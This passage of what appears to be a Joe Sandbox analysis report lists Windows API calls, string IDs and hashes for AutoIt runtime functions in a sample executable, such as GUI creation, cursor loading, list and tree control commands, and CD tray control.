                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 006028C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 006028F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 0060291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00602939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00602949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0060297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00602990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 006029AE
                                                    • GetStockObject.GDI32(00000011), ref: 006029CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006029D5
                                                      • Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
                                                      • Part of subcall function 00602344: ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00601256), ref: 006029FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 8b0b19a733a30f5f9d694be352fe0a684328409c2faf9ea19e423f7be4b7d686
                                                    • Instruction ID: b479fd2528e3e16daebc98b88e8dfe6c83be66ef8785d5d132013a6efd7bf326
                                                    • Opcode Fuzzy Hash: 8b0b19a733a30f5f9d694be352fe0a684328409c2faf9ea19e423f7be4b7d686
                                                    • Instruction Fuzzy Hash: 8AB15E7164020AAFDB14DF68DC59BEE7BA6FF08314F108229FA15A72D0DB74E851CB64
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006840F6
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006841B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: ab58c724d311048e92c3337594c3917987f6d3b4c5eff75b2d64509045bd1e17
                                                    • Instruction ID: ed72ec7b440f15638a8b44618eaa28c224305fc724a09cd873c15bf5711187bf
                                                    • Opcode Fuzzy Hash: ab58c724d311048e92c3337594c3917987f6d3b4c5eff75b2d64509045bd1e17
                                                    • Instruction Fuzzy Hash: 79A18E302542129FCB58FF20C851AAAB7A7AF84314F144A6CB8969B7D3DF30ED06CB55
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00675309
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00675314
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0067531F
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0067532A
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00675335
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00675340
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0067534B
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00675356
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00675361
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0067536C
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00675377
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00675382
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0067538D
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00675398
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 006753A3
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 006753AE
                                                    • GetCursorInfo.USER32(?), ref: 006753BE
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 006753E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: a7d0381f1352b4a08e9630e4eb9169f4bc28457cd9acb0ea77f13a76df40275b
                                                    • Instruction ID: eb1f96b42129c871a7ff35681d5c3c438fddb278484b178dcec1e2f0bbaf5ba0
                                                    • Opcode Fuzzy Hash: a7d0381f1352b4a08e9630e4eb9169f4bc28457cd9acb0ea77f13a76df40275b
                                                    • Instruction Fuzzy Hash: DF416270E043196ADB109FBA8C4996FFFF9EF51B60B10452FE509E7291DAB8A401CF61
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065AAA5
                                                    • __swprintf.LIBCMT ref: 0065AB46
                                                    • _wcscmp.LIBCMT ref: 0065AB59
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065ABAE
                                                    • _wcscmp.LIBCMT ref: 0065ABEA
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0065AC21
                                                    • GetDlgCtrlID.USER32(?), ref: 0065AC73
                                                    • GetWindowRect.USER32(?,?), ref: 0065ACA9
                                                    • GetParent.USER32(?), ref: 0065ACC7
                                                    • ScreenToClient.USER32(00000000), ref: 0065ACCE
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065AD48
                                                    • _wcscmp.LIBCMT ref: 0065AD5C
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0065AD82
                                                    • _wcscmp.LIBCMT ref: 0065AD96
                                                      • Part of subcall function 0062386C: _iswctype.LIBCMT ref: 00623874
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 371f0c77455036b296f7999d91d0b8dd3153764d8658bad76bdc5b5dd7b435cf
                                                    • Instruction ID: dbd2651d30a13b49343eac933e421d95ab5b08816affd2262884ad450db78fce
                                                    • Opcode Fuzzy Hash: 371f0c77455036b296f7999d91d0b8dd3153764d8658bad76bdc5b5dd7b435cf
                                                    • Instruction Fuzzy Hash: 16A1AF71204616AFD714EFA4C884BEAB7EAFF04356F10472DFD9982290D730E959CB92
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0065B3DB
                                                    • _wcscmp.LIBCMT ref: 0065B3EC
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0065B414
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0065B431
                                                    • _wcscmp.LIBCMT ref: 0065B44F
                                                    • _wcsstr.LIBCMT ref: 0065B460
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065B498
                                                    • _wcscmp.LIBCMT ref: 0065B4A8
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0065B4CF
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065B518
                                                    • _wcscmp.LIBCMT ref: 0065B528
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0065B550
                                                    • GetWindowRect.USER32(00000004,?), ref: 0065B5B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 386e041b5a7cafc5f788c10247a97dcd5abe90409b9739d620bd78d3ca88236c
                                                    • Instruction ID: 93718faed882af94854846a6fa4b1da2189b27f3ab587fb875ea80b223054275
                                                    • Opcode Fuzzy Hash: 386e041b5a7cafc5f788c10247a97dcd5abe90409b9739d620bd78d3ca88236c
                                                    • Instruction Fuzzy Hash: 4181E0710043059FDB14CF10D881FAA77EAEF44315F08A56DFD858A296EB34DD49CBA1
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0068C917
                                                      • Part of subcall function 0068ADF1: ClientToScreen.USER32(?,?), ref: 0068AE1A
                                                      • Part of subcall function 0068ADF1: GetWindowRect.USER32(?,?), ref: 0068AE90
                                                      • Part of subcall function 0068ADF1: PtInRect.USER32(?,?,0068C304), ref: 0068AEA0
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068C980
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068C98B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068C9AE
                                                    • _wcscat.LIBCMT ref: 0068C9DE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068C9F5
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068CA0E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068CA25
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068CA47
                                                    • DragFinish.SHELL32(?), ref: 0068CA4E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prl
                                                    • API String ID: 169749273-2548919611
                                                    • Opcode ID: df7664251fdcdfaf883e787ec339e8e7aeff72e9dc0ab038bd1dc10e6a071d2b
                                                    • Instruction ID: 206e3c8f79637a1f1ba0285e745873d31c9e6f4d1b8c6ecee9477a3cc178ad57
                                                    • Opcode Fuzzy Hash: df7664251fdcdfaf883e787ec339e8e7aeff72e9dc0ab038bd1dc10e6a071d2b
                                                    • Instruction Fuzzy Hash: EC616C71148301AFC705EF64DC85D9FBBEAEF89710F000A2EF591971A1DB709A49CB66
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: a316876991018ff1c39442aec28c8a018f0a22db412bc5dfe9fdbf653c7a0426
                                                    • Instruction ID: a6057d0fd8f38627333352cd18c6c6dde17c9c4a7b6014adc20e428dd85d285a
                                                    • Opcode Fuzzy Hash: a316876991018ff1c39442aec28c8a018f0a22db412bc5dfe9fdbf653c7a0426
                                                    • Instruction Fuzzy Hash: C531DC70A84215A6DB18FA60CD83EFE77A79F20751F60002DB901721D2EF616F09CAB9
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0065C4D4
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0065C4E6
                                                    • SetWindowTextW.USER32(?,?), ref: 0065C4FD
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065C512
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065C518
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C528
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065C52E
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0065C54F
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0065C569
                                                    • GetWindowRect.USER32(?,?), ref: 0065C572
                                                    • SetWindowTextW.USER32(?,?), ref: 0065C5DD
                                                    • GetDesktopWindow.USER32 ref: 0065C5E3
                                                    • GetWindowRect.USER32(00000000), ref: 0065C5EA
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0065C636
                                                    • GetClientRect.USER32(?,?), ref: 0065C643
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0065C668
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0065C693
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 93fd9a2d3c43ef5da052559a4b0ab241c5ecde9e9f6e59b8763764d83da93055
                                                    • Instruction ID: 68a4f0b6a7d590afdbee6ecc3d0faa17c89d5cd2315671cbcaee17703e5bf58d
                                                    • Opcode Fuzzy Hash: 93fd9a2d3c43ef5da052559a4b0ab241c5ecde9e9f6e59b8763764d83da93055
                                                    • Instruction Fuzzy Hash: 9E517370900709AFDB20DFA8DD85FAEBBF6FF04715F004628E646A26A0D774B955CB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068A4C8
                                                    • DestroyWindow.USER32(?,?), ref: 0068A542
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068A5BC
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068A5DE
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A5F1
                                                    • DestroyWindow.USER32(00000000), ref: 0068A613
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0068A64A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A663
                                                    • GetDesktopWindow.USER32 ref: 0068A67C
                                                    • GetWindowRect.USER32(00000000), ref: 0068A683
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068A69B
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068A6B3
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 2fea8ec370afa2ca42304f20dc928f3e6274929bca153504fadca21b1a8bad55
                                                    • Instruction ID: c9274879256fdc6fbd8eaefde5556a35998c73bd55949886d8c37726b845fb46
                                                    • Opcode Fuzzy Hash: 2fea8ec370afa2ca42304f20dc928f3e6274929bca153504fadca21b1a8bad55
                                                    • Instruction Fuzzy Hash: E2716E71140205AFE724DF68CC49FA677E6FB98304F08462DF985873A0E771E982CB66
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006846AB
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006846F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 097989a515bf32050dde063ca7a49063a5eee5f6fca1ad1e0ab3fce44e777e93
                                                    • Instruction ID: 1a206b206a0fad234641eed0d84c43f02245617273f2360925ce578826360576
                                                    • Opcode Fuzzy Hash: 097989a515bf32050dde063ca7a49063a5eee5f6fca1ad1e0ab3fce44e777e93
                                                    • Instruction Fuzzy Hash: C6918E742047129FCB58EF14C451AAABBA3AF44314F04495CF8965B7A3DF30ED4ACB95
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068BB6E
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00686D80,?), ref: 0068BBCA
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BC03
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0068BC46
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BC7D
                                                    • FreeLibrary.KERNEL32(?), ref: 0068BC89
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068BC99
                                                    • DestroyIcon.USER32(?), ref: 0068BCA8
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068BCC5
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068BCD1
                                                      • Part of subcall function 0062313D: __wcsicmp_l.LIBCMT ref: 006231C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: 48abb82bba15fb2a3a90186495df73cfc755e5eb608737f208f7ad22aa9dbea1
                                                    • Instruction ID: 7836a896c344f4f1cd61ee364af8592a1f4f068bd61d1ad38978ef9e00576f08
                                                    • Opcode Fuzzy Hash: 48abb82bba15fb2a3a90186495df73cfc755e5eb608737f208f7ad22aa9dbea1
                                                    • Instruction Fuzzy Hash: 8461EF71640619BAEB14EF64DC45FFE77AAFB08710F10521AF815D61D0DBB4A990CBA0
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,0068FB78), ref: 0066A0FC
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 0066A11E
                                                    • __swprintf.LIBCMT ref: 0066A177
                                                    • __swprintf.LIBCMT ref: 0066A190
                                                    • _wprintf.LIBCMT ref: 0066A246
                                                    • _wprintf.LIBCMT ref: 0066A264
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%i
                                                    • API String ID: 311963372-1370302273
                                                    • Opcode ID: 891635f0552f6ebc8eec4927f4db284c13eb21b380f69e6d6e9c0b41d8d8accb
                                                    • Instruction ID: 6062f160bdf26796652e141b5d4ed16c34cacddb28a6d23e7fbf3340fd918d86
                                                    • Opcode Fuzzy Hash: 891635f0552f6ebc8eec4927f4db284c13eb21b380f69e6d6e9c0b41d8d8accb
                                                    • Instruction Fuzzy Hash: D9519E71940209AACF59EBE0CD92EEFB77BAF04300F140169B505721A1EB356F88DFA5
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CharLowerBuffW.USER32(?,?), ref: 0066A636
                                                    • GetDriveTypeW.KERNEL32 ref: 0066A683
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A6CB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A702
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A730
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: 6d627f2d9db22c4485a6f36d4c1b27ff00cee21bb147430c5b5337d3fb6e6bbf
